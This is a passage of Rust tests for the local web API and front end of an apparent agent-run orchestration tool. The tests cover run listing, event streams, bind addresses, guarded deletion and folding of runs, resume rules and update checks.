6533 state.seat_started("judge", "judge-2", std::time::Duration::from_secs(120), 0);
6534 let dir = f.runs().join(id);
6535 std::fs::create_dir_all(&dir).expect("run dir");
6536 std::fs::write(
6537 dir.join("run.json"),
6538 serde_json::to_string_pretty(&state).expect("serialize run"),
6539 )
6540 .expect("write run.json");
6541
6542 let cold = f.get(&format!("/api/runs/{id}")).await.json();
6545 assert_eq!(cold["active"]["judge-2"]["node"], "judge");
6546 assert_eq!(cold["live"], false, "{cold}");
6547
6548 write_daemon(f.home.path(), Timestamp::now());
6551 let warm = f.get(&format!("/api/runs/{id}")).await.json();
6552 assert_eq!(warm["live"], true, "{warm}");
6553 }
6554
6555 #[tokio::test]
6556 async fn the_run_list_is_newest_first_and_honours_a_limit() {
6557 let f = Fixture::start().await;
6558 for id in [
6559 "20260902-140501-aaaa",
6560 "20260902-140502-bbbb",
6561 "20260902-140503-cccc",
6562 ] {
6563 write_run(&f.runs(), id, RunStatus::Merged);
6564 }
6565
6566 let all = f.get("/api/runs").await.json();
6567 let capped = f.get("/api/runs?limit=2").await.json();
6568
6569 assert_eq!(all[0]["id"], "20260902-140503-cccc");
6570 assert_eq!(all.as_array().map(Vec::len), Some(3));
6571 assert_eq!(capped.as_array().map(Vec::len), Some(2));
6572 assert_eq!(capped[0]["id"], "20260902-140503-cccc");
6573 }
6574
6575 #[tokio::test]
6576 async fn the_report_route_serves_the_terminal_report_as_plain_text() {
6577 let f = Fixture::start().await;
6578 write_run(&f.runs(), "20260902-140501-a1b2", RunStatus::Blocked);
6579
6580 let res = f.get("/api/runs/20260902-140501-a1b2/report").await;
6581
6582 assert_eq!(res.status, 200);
6583 assert!(
6584 res.headers
6585 .contains("content-type: text/plain; charset=utf-8"),
6586 "a browser must render it, not download it: {}",
6587 res.headers
6588 );
6589 assert!(
6593 res.body.contains("20260902-140501-a1b2"),
6594 "the report is about the run that was asked for: {}",
6595 res.body
6596 );
6597 }
6598
6599 #[tokio::test]
6600 async fn the_front_end_is_served_from_the_binary_with_types_a_phone_renders() {
6601 let f = Fixture::start().await;
6602
6603 let html = f.get("/").await;
6604 let css = f.get("/app.css").await;
6605 let js = f.get("/app.js").await;
6606
6607 assert_eq!((html.status, css.status, js.status), (200, 200, 200));
6608 assert!(
6609 html.headers
6610 .contains("content-type: text/html; charset=utf-8")
6611 );
6612 assert!(css.headers.contains("content-type: text/css"));
6613 assert!(js.headers.contains("content-type: text/javascript"));
6614 assert_eq!(html.body, INDEX_HTML, "compiled in, never read from disk");
6615 }
6616
6617 #[test]
6618 fn review_rounds_label_a_distinct_verified_head() {
6619 assert!(APP_JS.contains("round.verified_head"));
6620 assert!(APP_JS.contains("verified HEAD"));
6621 assert!(APP_JS.contains("verified ${String(round.verified_head).slice(0, 7)}"));
6622 }
6623
6624 #[tokio::test]
6625 async fn the_change_stream_announces_the_current_revisions_on_connect() {
6626 let f = Fixture::start().await;
6627
6628 let mut socket = tokio::net::TcpStream::connect(f.addr)
6629 .await
6630 .expect("connect");
6631 socket
6632 .write_all(
6633 b"GET /api/events HTTP/1.1\r\nHost: magi\r\nAccept: text/event-stream\r\n\r\n",
6634 )
6635 .await
6636 .expect("write request");
6637
6638 let mut seen = String::new();
6641 let mut buf = [0u8; 1024];
6642 while !seen.contains("event: change") {
6643 let read = tokio::time::timeout(Duration::from_secs(5), socket.read(&mut buf))
6644 .await
6645 .expect("the stream must speak within five seconds")
6646 .expect("read");
6647 assert!(read > 0, "the server closed the change stream: {seen}");
6648 seen.push_str(&String::from_utf8_lossy(&buf[..read]));
6649 }
6650
6651 assert!(
6652 seen.to_lowercase()
6653 .contains("content-type: text/event-stream"),
6654 "the browser only reconnects automatically for a real SSE stream: {seen}"
6655 );
6656 let data = seen
6657 .lines()
6658 .find_map(|l| l.strip_prefix("data:"))
6659 .expect("a data line");
6660 let payload: Value = serde_json::from_str(data.trim()).expect("json payload");
6661 assert!(
6662 payload["queue_rev"].is_u64()
6663 && payload["runs_rev"].is_u64()
6664 && payload["questions_rev"].is_u64()
6665 && payload["talks_rev"].is_u64()
6666 && payload["loop_rev"].is_u64(),
6667 "the client needs one revision per store to know what to refetch, \
6668 and `talks_rev` is the only notification a standing talk gets - a \
6669 phone whose radio slept through a turn learns about it here, as \
6670 does one whose operator started the loop from another device: \
6671 {payload}"
6672 );
6673
6674 let health = f.get("/api/health").await.json();
6681 for key in [
6682 "queue_rev",
6683 "runs_rev",
6684 "questions_rev",
6685 "talks_rev",
6686 "loop_rev",
6687 ] {
6688 assert!(
6689 health[key].is_u64(),
6690 "health is the change stream's fallback and is missing `{key}`: {health}"
6691 );
6692 }
6693 }
6694
6695 #[tokio::test]
6696 async fn a_new_turn_on_a_talk_moves_the_change_stream_revision() {
6697 let f = Fixture::start().await;
6698 let before = f.get("/api/health").await.json()["talks_rev"]
6699 .as_u64()
6700 .expect("talks_rev");
6701
6702 let talk = seed_talk(&f, "20260904-014455-ab12", "open");
6703 std::thread::sleep(Duration::from_millis(10));
6704 let mut on_disk = f.talks().get(&talk).expect("get seeded talk");
6705 on_disk.turns.push(crate::talk::Turn {
6706 who: crate::talk::Who::Operator,
6707 body: "a new turn".to_owned(),
6708 at: Timestamp::now(),
6709 attachments: Vec::new(),
6710 });
6711 f.talks().put(&mut on_disk).expect("record a turn");
6712
6713 let after = f.get("/api/health").await.json()["talks_rev"]
6714 .as_u64()
6715 .expect("talks_rev");
6716 assert_ne!(
6717 before, after,
6718 "a phone must be able to notice a talk's reply without polling every store"
6719 );
6720 }
6721
6722 #[test]
6723 fn bind_reads_back_from_the_spelling_the_cli_prints() {
6724 for bind in [Bind::Auto, Bind::Addr(IpAddr::V4(Ipv4Addr::LOCALHOST))] {
6728 assert_eq!(bind.to_string().parse::<Bind>(), Ok(bind));
6729 }
6730 assert_eq!("AUTO".parse::<Bind>(), Ok(Bind::Auto));
6731 assert!("everywhere".parse::<Bind>().is_err());
6732 }
6733
6734 #[test]
6735 fn an_explicit_bind_address_is_taken_verbatim() {
6736 let asked = IpAddr::V4(Ipv4Addr::new(192, 168, 1, 20));
6737
6738 let (addr, warning) = resolve_bind(&Bind::Addr(asked));
6739
6740 assert_eq!(addr, asked);
6741 assert!(
6742 warning.is_none(),
6743 "an operator who named an address gets no lecture"
6744 );
6745 }
6746
6747 #[test]
6748 fn bind_auto_either_finds_a_tailnet_address_or_says_the_ui_is_local_only() {
6749 let (addr, warning) = resolve_bind(&Bind::Auto);
6750
6751 match addr {
6758 IpAddr::V4(ip) if is_tailnet(&ip) => {
6759 assert!(warning.is_none(), "a tailnet address needs no warning");
6760 }
6761 other => {
6762 assert_eq!(other, IpAddr::V4(Ipv4Addr::LOCALHOST));
6763 let warning = warning.expect("a fallback has to explain itself");
6764 assert!(
6765 warning.contains("127.0.0.1") && warning.contains("local-only"),
6766 "the warning says what happened and what it costs: {warning}"
6767 );
6768 }
6769 }
6770 }
6771
6772 #[test]
6773 fn only_the_cgnat_block_counts_as_a_tailnet_address() {
6774 assert!(is_tailnet(&Ipv4Addr::new(100, 64, 0, 1)));
6778 assert!(is_tailnet(&Ipv4Addr::new(100, 127, 255, 254)));
6779 assert!(!is_tailnet(&Ipv4Addr::new(100, 63, 255, 255)));
6780 assert!(!is_tailnet(&Ipv4Addr::new(100, 128, 0, 1)));
6781 assert!(!is_tailnet(&Ipv4Addr::new(127, 0, 0, 1)));
6782 }
6783
6784 #[test]
6785 fn an_ambiguous_prefix_is_a_bad_request_and_a_missing_one_is_not_found() {
6786 let ids = vec![
6787 "20260902-140501-aaaa".to_owned(),
6788 "20260902-140502-aabb".to_owned(),
6789 ];
6790
6791 let missing = pick(ids.clone(), "zzzz", "run").expect_err("no match");
6792 let ambiguous = pick(ids.clone(), "202609", "run").expect_err("two matches");
6793 let short = pick(ids, "aabb", "run").expect("the short id is the tail of an id");
6794
6795 assert_eq!(missing.status, StatusCode::NOT_FOUND);
6796 assert_eq!(ambiguous.status, StatusCode::BAD_REQUEST);
6797 assert_eq!(short, "20260902-140502-aabb");
6798 }
6799 #[tokio::test]
6800 async fn a_panel_reaches_its_assets_by_the_bare_name_it_was_told_to_use() {
6801 let fx = Fixture::start().await;
6807 let id = panel(
6808 &fx,
6809 "<img src=\"shot.png\">",
6810 &[("shot.png", b"\x89PNG\r\n\x1a\n")],
6811 );
6812
6813 let doc = fx
6815 .get(&format!("/api/questions/{id}/panel/index.html"))
6816 .await;
6817 assert_eq!(doc.status, 200, "{}", doc.body);
6818 assert_eq!(doc.header("content-type"), Some("text/html; charset=utf-8"));
6819
6820 let sibling = fx.get(&format!("/api/questions/{id}/panel/shot.png")).await;
6821 assert_eq!(sibling.status, 200, "{}", sibling.body);
6822 assert_eq!(sibling.header("content-type"), Some("image/png"));
6823 assert_eq!(
6824 sibling.header("content-security-policy"),
6825 Some(PANEL_CSP),
6826 "the sibling route must carry the same policy as the asset route"
6827 );
6828
6829 assert_eq!(
6832 fx.head(&format!("/api/questions/{id}/panel")).await.status,
6833 200
6834 );
6835 }
6836
6837 #[test]
6838 fn runs_revision_moves_when_deleting_an_older_run() {
6839 let temp = TempDir::new().expect("tempdir");
6840 let runs = temp.path().join("runs");
6841 std::fs::create_dir_all(&runs).expect("create runs dir");
6842
6843 assert_eq!(runs_revision(&runs), 0, "empty runs has 0 revision");
6844
6845 write_run(&runs, "20260901-100000-old1", RunStatus::Merged);
6846 std::thread::sleep(Duration::from_millis(10));
6847 write_run(&runs, "20260902-100000-new2", RunStatus::Merged);
6848
6849 let rev_before = runs_revision(&runs);
6850 assert!(rev_before > 0);
6851
6852 let old_dir = runs.join("20260901-100000-old1");
6853 std::fs::remove_dir_all(&old_dir).expect("remove old run");
6854
6855 let rev_after = runs_revision(&runs);
6856 assert_ne!(
6857 rev_before, rev_after,
6858 "deleting an older run must change the revision so other clients see the deletion"
6859 );
6860 }
6861
6862 fn write_state(runs: &FsPath, state: &RunState) {
6867 let dir = runs.join(&state.id);
6868 std::fs::create_dir_all(&dir).expect("run dir");
6869 std::fs::write(
6870 dir.join("run.json"),
6871 serde_json::to_string_pretty(state).expect("serialize run"),
6872 )
6873 .expect("write run.json");
6874 }
6875
6876 #[test]
6881 fn runs_revision_moves_when_a_seat_starts_and_again_when_it_finishes() {
6882 let temp = TempDir::new().expect("tempdir");
6883 let runs = temp.path().join("runs");
6884 std::fs::create_dir_all(&runs).expect("create runs dir");
6885 let mut state = RunState::new(
6886 PathBuf::from("/repo/magi"),
6887 "main".to_owned(),
6888 "0123456789abcdef".to_owned(),
6889 "task".to_owned(),
6890 Config::default(),
6891 );
6892 state.id = "20260902-100000-c0de".to_owned();
6893 write_state(&runs, &state);
6894
6895 let rev_idle = runs_revision(&runs);
6896 std::thread::sleep(Duration::from_millis(10));
6897 state.seat_started("judge", "judge-1", std::time::Duration::from_secs(60), 0);
6898 write_state(&runs, &state);
6899 let rev_started = runs_revision(&runs);
6900 assert_ne!(
6901 rev_idle, rev_started,
6902 "a seat starting must move the revision"
6903 );
6904
6905 std::thread::sleep(Duration::from_millis(10));
6906 state.seat_finished("judge-1");
6907 write_state(&runs, &state);
6908 let rev_finished = runs_revision(&runs);
6909 assert_ne!(
6910 rev_started, rev_finished,
6911 "and clearing it again must move the revision a second time"
6912 );
6913 }
6914
6915 #[tokio::test]
6916 async fn delete_queue_task_deletes_file_and_guards_running_and_locked() {
6917 let fx = Fixture::start().await;
6918 let q = fx.queue();
6919
6920 let mut t1 = Task::new(
6922 "Task 1".to_owned(),
6923 "Instruction 1".to_owned(),
6924 PathBuf::from("/repo"),
6925 Source::Human,
6926 );
6927 let run_id = "20260901-000000-r111";
6928 t1.runs.push(run_id.to_owned());
6929 write_run(&fx.runs(), run_id, RunStatus::Merged);
6930 q.put(&mut t1).expect("put t1");
6931
6932 let res = fx.delete(&format!("/api/queue/{}", t1.short())).await;
6934 assert_eq!(res.status, 204);
6935 assert!(res.body.is_empty(), "204 No Content has no body");
6936 assert!(!q.path_of(&t1.id).exists(), "task file is deleted");
6937 assert!(
6938 fx.runs().join(run_id).exists(),
6939 "run directory must not be deleted when its task is deleted"
6940 );
6941
6942 let mut t2 = Task::new(
6944 "Task 2".to_owned(),
6945 "Instruction 2".to_owned(),
6946 PathBuf::from("/repo"),
6947 Source::Human,
6948 );
6949 t2.status = TaskStatus::Running;
6950 q.put(&mut t2).expect("put t2");
6951 let mut beat = crate::daemon::Status::new();
6952 beat.current = vec![crate::daemon::Current {
6953 task: t2.id.clone(),
6954 run: "20260901-000000-r222".to_owned(),
6955 }];
6956 beat.updated_at = jiff::Timestamp::now();
6957 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
6958 .expect("publish a heartbeat");
6959 let res = fx.delete(&format!("/api/queue/{}", t2.id)).await;
6960 assert_eq!(res.status, 409);
6961 assert!(
6962 res.json()["error"]
6963 .as_str()
6964 .unwrap()
6965 .contains("live daemon")
6966 );
6967 assert!(q.path_of(&t2.id).exists(), "a task in flight is kept");
6968
6969 beat.updated_at = jiff::Timestamp::now() - jiff::SignedDuration::from_secs(600);
6975 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
6976 .expect("leave a stale heartbeat");
6977 let mut t3 = Task::new(
6978 "Task 3".to_owned(),
6979 "Instruction 3".to_owned(),
6980 PathBuf::from("/repo"),
6981 Source::Human,
6982 );
6983 t3.status = TaskStatus::Running;
6984 q.put(&mut t3).expect("put t3");
6985 std::mem::forget(q.claim(&t3.id).expect("claim t3"));
6986 let res = fx.delete(&format!("/api/queue/{}", t3.id)).await;
6987 assert_eq!(res.status, 204);
6988 assert!(!q.path_of(&t3.id).exists(), "the task file is gone");
6989 assert!(
6990 q.claim(&t3.id).is_ok(),
6991 "the stale lock went with it, so the id is claimable again"
6992 );
6993
6994 let res = fx.delete("/api/queue/nonexistent").await;
6996 assert_eq!(res.status, 404);
6997 }
6998
6999 #[tokio::test]
7000 async fn delete_run_deletes_directory_and_guards_running_and_unfolded() {
7001 let fx = Fixture::start().await;
7002 let runs = fx.runs();
7003
7004 let run_id = "20260901-000000-fold";
7006 let mut state = RunState::new(
7007 PathBuf::from("/repo"),
7008 "main".to_owned(),
7009 "abc".to_owned(),
7010 "instruction".to_owned(),
7011 Config::default(),
7012 );
7013 state.id = run_id.to_owned();
7014 state.status = RunStatus::Merged;
7015 state.candidates.push(crate::run::Candidate {
7016 index: 0,
7017 label: 'A',
7018 agent: "a".to_owned(),
7019 branch: "b".to_owned(),
7020 worktree: PathBuf::from("/w"),
7021 summary: String::new(),
7022 stat: String::new(),
7023 files: 1,
7024 commits: 1,
7025 empty: false,
7026 failed: None,
7027 duration_ms: 0,
7028 folded: true,
7029 });
7030 let dir = runs.join(run_id);
7031 std::fs::create_dir_all(dir.join("artifacts")).expect("create artifacts");
7032 std::fs::write(dir.join("artifacts").join("patch.diff"), "dummy diff")
7033 .expect("write artifact");
7034 std::fs::write(dir.join("run.json"), serde_json::to_string(&state).unwrap())
7035 .expect("write run.json");
7036
7037 let res = fx.delete(&format!("/api/runs/{}", state.short())).await;
7039 assert_eq!(res.status, 204);
7040 assert!(res.body.is_empty(), "204 has no body");
7041 assert!(!dir.exists(), "run directory and artifacts must be deleted");
7042
7043 let run_running = "20260901-000000-rung";
7048 write_run(&runs, run_running, RunStatus::Prep);
7049 let mut beat = crate::daemon::Status::new();
7050 beat.current = vec![crate::daemon::Current {
7051 task: "20260901-000000-task".to_owned(),
7052 run: run_running.to_owned(),
7053 }];
7054 beat.updated_at = jiff::Timestamp::now();
7055 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
7056 .expect("publish a heartbeat");
7057 let res = fx.delete(&format!("/api/runs/{run_running}")).await;
7058 assert_eq!(res.status, 409);
7059 assert!(
7060 res.json()["error"]
7061 .as_str()
7062 .unwrap()
7063 .contains("live daemon"),
7064 "the refusal must say who is holding it"
7065 );
7066 assert!(
7067 runs.join(run_running).exists(),
7068 "a run in flight keeps its directory"
7069 );
7070
7071 let run_unfolded = "20260901-000000-unfd";
7073 let mut state2 = RunState::new(
7074 PathBuf::from("/repo"),
7075 "main".to_owned(),
7076 "abc".to_owned(),
7077 "instruction".to_owned(),
7078 Config::default(),
7079 );
7080 state2.id = run_unfolded.to_owned();
7081 state2.status = RunStatus::Ready;
7082 state2.candidates.push(crate::run::Candidate {
7083 index: 0,
7084 label: 'A',
7085 agent: "a".to_owned(),
7086 branch: "b".to_owned(),
7087 worktree: PathBuf::from("/w"),
7088 summary: String::new(),
7089 stat: String::new(),
7090 files: 1,
7091 commits: 1,
7092 empty: false,
7093 failed: None,
7094 duration_ms: 0,
7095 folded: false,
7096 });
7097 let dir2 = runs.join(run_unfolded);
7098 std::fs::create_dir_all(&dir2).expect("create dir2");
7099 std::fs::write(
7100 dir2.join("run.json"),
7101 serde_json::to_string(&state2).unwrap(),
7102 )
7103 .expect("write run.json");
7104
7105 let res = fx.delete(&format!("/api/runs/{run_unfolded}")).await;
7106 assert_eq!(res.status, 409);
7107 assert!(res.json()["error"].as_str().unwrap().contains("magi fold"));
7108 assert!(dir2.exists(), "unfolded run directory is kept");
7109
7110 let res = fx.delete("/api/runs/nonexistent").await;
7112 assert_eq!(res.status, 404);
7113 }
7114
7115 #[test]
7116 fn web_ui_delete_contract_in_front_end() {
7117 assert!(APP_JS.contains("deleteRun:"));
7119 assert!(APP_JS.contains("deleteTask:"));
7120
7121 let run_cards_slice = &APP_JS[APP_JS.find("function createRunCard").unwrap()
7123 ..APP_JS.find("function renderRuns").unwrap()];
7124 assert!(!run_cards_slice.to_lowercase().contains("delete"));
7125
7126 assert!(APP_JS.contains("renderRunDelete"));
7128 assert!(APP_JS.contains("runDeleteReason"));
7129 assert!(APP_JS.contains("magi fold"));
7130 assert!(APP_JS.contains("This run is still in flight and cannot be deleted."));
7131
7132 assert!(APP_JS.contains("cancel.focus"));
7134 assert!(APP_JS.contains("armedRunDelete"));
7135 assert!(APP_JS.contains("armedDelete"));
7136
7137 assert!(APP_JS.contains("disabled: status === \"running\""));
7139 }
7140
7141 #[test]
7161 fn every_ref_a_run_card_uses_is_one_its_builder_published() {
7162 let build = APP_JS
7163 .find("function createRunCard")
7164 .expect("createRunCard exists");
7165 let update = APP_JS
7166 .find("function updateRunCard")
7167 .expect("updateRunCard exists");
7168 let end = APP_JS
7169 .find("function renderRuns")
7170 .expect("renderRuns exists");
7171
7172 let builder = &APP_JS[build..update];
7174 let open = builder.find("refs = {").expect("createRunCard sets refs");
7175 let literal = &builder[open + "refs = {".len()..];
7176 let close = literal.find('}').expect("the refs literal is closed");
7177 let published: HashSet<&str> = literal[..close]
7178 .split(',')
7179 .filter_map(|entry| entry.split(':').next())
7181 .map(str::trim)
7182 .filter(|name| !name.is_empty())
7183 .collect();
7184 assert!(
7185 published.len() > 5,
7186 "the refs literal did not parse into names: {published:?}"
7187 );
7188
7189 let mut used: Vec<&str> = Vec::new();
7192 let updaters = &APP_JS[update..end];
7193 for (at, _) in updaters.match_indices("r.") {
7194 let before = updaters[..at].chars().next_back();
7197 if before.is_some_and(|c| c.is_alphanumeric() || c == '_' || c == '$' || c == '.') {
7198 continue;
7199 }
7200 let rest = &updaters[at + 2..];
7201 let len = rest
7202 .find(|c: char| !(c.is_alphanumeric() || c == '_' || c == '$'))
7203 .unwrap_or(rest.len());
7204 if len > 0 {
7205 used.push(&rest[..len]);
7206 }
7207 }
7208 assert!(
7209 used.len() > 5,
7210 "no `r.<name>` uses were found; the updaters must have been rewritten: {used:?}"
7211 );
7212
7213 let missing: Vec<&str> = used
7214 .iter()
7215 .copied()
7216 .filter(|name| !published.contains(name))
7217 .collect();
7218 assert!(
7219 missing.is_empty(),
7220 "a run card's updater reaches for {missing:?}, which `createRunCard` \
7221 never put in `refs` - every card will throw and the list will \
7222 render empty under a count line that says otherwise. Published: \
7223 {published:?}"
7224 );
7225 }
7226
7227 #[tokio::test]
7228 async fn folding_from_the_phone_reports_what_it_removed() {
7229 let fx = Fixture::start().await;
7230 let runs = fx.runs();
7231
7232 let id = "20260901-000000-fold";
7236 write_run(&runs, id, RunStatus::Stalled);
7237 let res = fx.post(&format!("/api/runs/{id}/fold"), None).await;
7238 assert_eq!(res.status, 200);
7239 assert_eq!(res.json()["removed_count"], 0);
7240 assert_eq!(res.json()["run"], id);
7241 assert!(
7242 runs.join(id).exists(),
7243 "a fold keeps the run's record; only the worktrees go"
7244 );
7245 }
7246
7247 #[tokio::test]
7248 async fn folding_an_unreadable_run_falls_back_to_removing_it_wholesale() {
7249 let fx = Fixture::start().await;
7250 let runs = fx.runs();
7251 let wt = fx.home.path().join("wt").join("magi").join("dead");
7252 let id = "20260901-000000-dead";
7253 std::fs::create_dir_all(runs.join(id)).expect("run dir");
7254 std::fs::write(runs.join(id).join("run.json"), "not json").expect("garbage state");
7255 std::fs::create_dir_all(&wt).expect("worktree dir");
7256
7257 let res = fx.post(&format!("/api/runs/{id}/fold"), None).await;
7258 assert_eq!(res.status, 200, "{}", res.body);
7259 assert!(
7260 res.json()["removed_count"].as_u64().unwrap() > 0,
7261 "the worktree this build could not read a state for still went"
7262 );
7263 assert!(
7264 !runs.join(id).exists(),
7265 "an unreadable run has no candidate list to fold selectively, so \
7266 the whole record goes - same as `magi fold` on the CLI"
7267 );
7268 }
7269
7270 #[tokio::test]
7271 async fn deleting_an_unreadable_run_removes_it_wholesale() {
7272 let fx = Fixture::start().await;
7273 let runs = fx.runs();
7274 let wt = fx.home.path().join("wt").join("magi").join("gone");
7275 let id = "20260901-000000-gone";
7276 std::fs::create_dir_all(runs.join(id)).expect("run dir");
7277 std::fs::write(runs.join(id).join("run.json"), "not json").expect("garbage state");
7278 std::fs::create_dir_all(&wt).expect("worktree dir");
7279
7280 let res = fx.delete(&format!("/api/runs/{id}")).await;
7281 assert_eq!(res.status, 204, "{}", res.body);
7282 assert!(!runs.join(id).exists(), "the broken record is gone");
7283 assert!(!wt.exists(), "its worktree is gone too");
7284 }
7285
7286 #[tokio::test]
7287 async fn folding_is_refused_while_a_daemon_is_working_on_the_run() {
7288 let fx = Fixture::start().await;
7289 let runs = fx.runs();
7290 let id = "20260901-000000-live";
7291 write_run(&runs, id, RunStatus::Implementing);
7292
7293 let mut beat = crate::daemon::Status::new();
7294 beat.current = vec![crate::daemon::Current {
7295 task: "20260901-000000-task".to_owned(),
7296 run: id.to_owned(),
7297 }];
7298 beat.updated_at = jiff::Timestamp::now();
7299 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
7300 .expect("publish a heartbeat");
7301
7302 let res = fx.post(&format!("/api/runs/{id}/fold"), None).await;
7303 assert_eq!(res.status, 409);
7304 assert!(
7305 res.json()["error"]
7306 .as_str()
7307 .unwrap()
7308 .contains("live daemon"),
7309 "folding under a running agent would pull its worktree away"
7310 );
7311 }
7312
7313 #[tokio::test]
7314 async fn resume_is_refused_unless_the_run_stopped_somewhere_it_can_continue() {
7315 let fx = Fixture::start().await;
7316 let runs = fx.runs();
7317
7318 for (status, word) in [
7324 (RunStatus::Merged, "merged"),
7325 (RunStatus::Ready, "ready"),
7326 (RunStatus::Failed, "failed"),
7327 ] {
7328 let id = format!("20260901-000000-{}", &word[..4]);
7329 write_run(&runs, &id, status);
7330 let res = fx.post(&format!("/api/runs/{id}/resume"), None).await;
7331 assert_eq!(res.status, 409, "{word} must not be resumable");
7332 let err = res.json()["error"].as_str().unwrap().to_owned();
7333 assert!(err.contains(word), "the refusal names the status: {err}");
7334 }
7335
7336 let mid = "20260901-000000-midf";
7341 write_run(&runs, mid, RunStatus::Reviewing);
7342 let res = fx.post(&format!("/api/runs/{mid}/resume"), None).await;
7343 assert_eq!(res.status, 202, "an interrupted run is resumable");
7344 }
7345
7346 #[tokio::test]
7347 async fn resume_is_refused_while_the_loop_is_running() {
7348 let fx = Fixture::start().await;
7349 let runs = fx.runs();
7350 let stalled = "20260901-000000-stal";
7351 write_run(&runs, stalled, RunStatus::Stalled);
7352
7353 let mut beat = crate::daemon::Status::new();
7357 beat.current = vec![crate::daemon::Current {
7358 task: "20260901-000000-task".to_owned(),
7359 run: "20260901-000000-othr".to_owned(),
7360 }];
7361 beat.updated_at = jiff::Timestamp::now();
7362 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
7363 .expect("publish a heartbeat");
7364
7365 let res = fx.post(&format!("/api/runs/{stalled}/resume"), None).await;
7366 assert_eq!(res.status, 409);
7367 let err = res.json()["error"].as_str().unwrap().to_owned();
7368 assert!(err.contains("othr"), "it names what the loop is on: {err}");
7369 assert!(err.contains("stop it first"), "{err}");
7370 }
7371
7372 #[test]
7373 fn a_run_cannot_be_resumed_twice_at_once() {
7374 let home = TempDir::new().expect("temp home");
7375 let ui = Ui::new(
7376 Queue::at(home.path().join("queue")),
7377 Questions::at(home.path().join("questions")),
7378 Talks::at(home.path().join("talks")),
7379 home.path().join("runs"),
7380 home.path().to_path_buf(),
7381 PathBuf::from("/repo"),
7382 )
7383 .with_worktrees_root(home.path().join("wt"));
7384 let first = ui.begin_resume("20260901-000000-once").expect("claimed");
7385 let again = ui.begin_resume("20260901-000000-once");
7386 assert!(again.is_err(), "a second tap must not start a second graph");
7387 drop(first);
7388 assert!(
7389 ui.begin_resume("20260901-000000-once").is_ok(),
7390 "and the claim is released when the attempt ends"
7391 );
7392 }
7393
7394 #[test]
7395 fn talk_thinking_tracks_only_its_held_turn_claim() {
7396 let home = TempDir::new().expect("temp home");
7397 let ui = Ui::new(
7398 Queue::at(home.path().join("queue")),
7399 Questions::at(home.path().join("questions")),
7400 Talks::at(home.path().join("talks")),
7401 home.path().join("runs"),
7402 home.path().to_path_buf(),
7403 PathBuf::from("/repo"),
7404 )
7405 .with_worktrees_root(home.path().join("wt"));
7406 let id = "20260901-000000-once";
7407
7408 assert!(!ui.is_thinking(id), "an unclaimed talk is not thinking");
7409 let turn = ui.begin_talk_turn(id).expect("claim turn");
7410 assert!(ui.is_thinking(id), "the held guard is reported as thinking");
7411 assert!(
7412 !ui.is_thinking("20260901-000000-other"),
7413 "one talk's turn does not make another talk busy"
7414 );
7415 drop(turn);
7416 assert!(!ui.is_thinking(id), "dropping the guard releases thinking");
7417 }
7418
7419 #[tokio::test]
7420 async fn an_upgrade_is_refused_when_the_loop_belongs_to_another_process() {
7421 let fx = Fixture::start().await;
7422 let mut beat = crate::daemon::Status::new();
7426 beat.pid = 4321;
7427 beat.updated_at = jiff::Timestamp::now();
7428 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
7429 .expect("publish a heartbeat");
7430
7431 let res = fx.post("/api/upgrade", None).await;
7432 assert_eq!(res.status, 409);
7433 let err = res.json()["error"].as_str().unwrap().to_owned();
7434 assert!(err.contains("4321"), "the refusal names the owner: {err}");
7435 assert!(err.contains("old one against the same queue"), "{err}");
7436 }
7437
7438 #[test]
7445 fn recheck_never_spawns_when_checking_is_off_or_killed_by_env() {
7446 assert!(!should_spawn_recheck(&crate::config::Update {
7447 mode: UpdateMode::Off,
7448 interval: None,
7449 }));
7450
7451 unsafe {
7454 std::env::set_var(crate::updater::NO_AUTOUPDATE_ENV, "1");
7455 }
7456 let killed = should_spawn_recheck(&crate::config::Update {
7457 mode: UpdateMode::Notify,
7458 interval: None,
7459 });
7460 unsafe {
7461 std::env::remove_var(crate::updater::NO_AUTOUPDATE_ENV);
7462 }
7463 assert!(
7464 !killed,
7465 "MAGI_NO_AUTOUPDATE must stop the periodic recheck, not just the \
7466 one-time startup check"
7467 );
7468
7469 assert!(should_spawn_recheck(&crate::config::Update {
7470 mode: UpdateMode::Notify,
7471 interval: None,
7472 }));
7473 }
7474
7475 #[test]
7481 fn recheck_poll_period_tracks_a_short_configured_interval() {
7482 let short = crate::config::Update {
7483 mode: UpdateMode::Notify,
7484 interval: Some("1m".to_owned()),
7485 };
7486 let period = recheck_poll_period(&short);
7487 assert!(
7488 period <= Duration::from_secs(30),
7489 "a one-minute interval must wake the task far sooner than the \
7490 default ceiling, or the deck would not notice within the \
7491 interval the operator configured: got {period:?}"
7492 );
7493
7494 let default = crate::config::Update {
7495 mode: UpdateMode::Notify,
7496 interval: None,
7497 };
7498 assert_eq!(
7499 recheck_poll_period(&default),
7500 UPDATE_RECHECK_POLL_MAX,
7501 "the default day-long interval should poll at the (capped) \
7502 ceiling rather than needlessly often"
7503 );
7504 }
7505
7506 #[test]
7514 fn recheck_skips_the_network_before_the_interval_elapses() {
7515 let dir = TempDir::new().expect("temp dir");
7516 let path = dir.path().join("state.json");
7517 let state = kaishin::UpdateCheckState {
7518 last_checked_unix: jiff::Timestamp::now().as_second() as u64,
7519 last_known_latest: None,
7520 last_known_url: None,
7521 };
7522 kaishin::save_check_state(&path, &state).expect("seed a just-checked state");
7523
7524 let checker = crate::updater::Checker::for_test(Duration::from_secs(24 * 60 * 60), path);
7525 assert!(
7526 !update_recheck_due(&checker, None),
7527 "a check made moments ago must not be repeated before the \
7528 configured interval elapses"
7529 );
7530 }
7531
7532 #[test]
7538 fn recheck_defers_to_an_upgrade_already_in_flight() {
7539 let dir = TempDir::new().expect("temp dir");
7540 let path = dir.path().join("state.json");
7541 let checker = crate::updater::Checker::for_test(Duration::from_secs(60 * 60), path);
7542 let progress = crate::updater::Progress::new("0.8.0".to_owned(), "v0.9.0".to_owned());
7543
7544 assert!(
7545 !update_recheck_due(&checker, Some(&progress)),
7546 "a recheck must not run while an upgrade this deck started is \
7547 still moving"
7548 );
7549 }
7550
7551 #[tokio::test]
7552 async fn an_upgrade_is_refused_by_the_no_autoupdate_kill_switch() {
7553 unsafe {
7565 std::env::set_var(crate::updater::NO_AUTOUPDATE_ENV, "1");
7566 }
7567 let fx = Fixture::start().await;
7568 let res = fx.post("/api/upgrade", None).await;
7569 unsafe {
